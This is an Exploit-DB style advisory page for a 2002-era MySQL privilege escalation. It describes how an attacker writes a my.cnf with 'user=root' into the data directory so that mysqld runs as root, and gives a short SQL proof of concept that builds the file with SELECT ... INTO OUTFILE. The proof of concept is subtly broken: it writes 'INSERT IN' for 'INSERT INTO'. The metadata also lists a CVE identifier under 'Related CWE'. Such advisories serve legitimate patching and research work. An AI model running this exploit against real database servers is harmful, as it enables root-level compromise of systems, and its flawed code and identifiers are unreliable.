MySQL Privilege Escalation Vulnerability

vendor:

MySQL

by:

SecurityFocus

7.5

CVSS

HIGH

Privilege Escalation

264

CWE

Product Name: MySQL

Affected Version From: 3.23.x

Affected Version To: 4.0.x

Patch Exists: YES

Related CWE: CVE-2002-0649

CPE: a:mysql:mysql

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows, Mac

2002

MySQL Privilege Escalation Vulnerability

An attacker can exploit this vulnerability by creating a DATADIR/my.cnf that includes the line 'user=root' under the '[mysqld]' option section. When the mysqld service is executed, it will run as the root user instead of the default user, which may allow an attacker to obtain elevated privileges on a compromised system.

Mitigation:

Ensure that the mysqld service is not running as root user.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7052/info

A vulnerability has been discovered for MySQL that may allow the mysqld service to start with elevated privileges.

An attacker can exploit this vulnerability by creating a DATADIR/my.cnf that includes the line 'user=root' under the '[mysqld]' option section.

When the mysqld service is executed, it will run as the root user instead of the default user.

This may allow an attacker to obtain elevated privileges on a compromised system.

mysql>CREATE DATABASE roottext;
mysql>USE roottext;
mysql>CREATE TABLE hack (conf VARCHAR(80));
mysql>INSERT IN hack VALUES ('[mysqld]');
mysql>INSERT IN hack VALUES ('user=root');
mysql>SELECT * INTO OUTFILE '/path/to/mysql/datadir/my.cnf' FROM hack
mysql>QUIT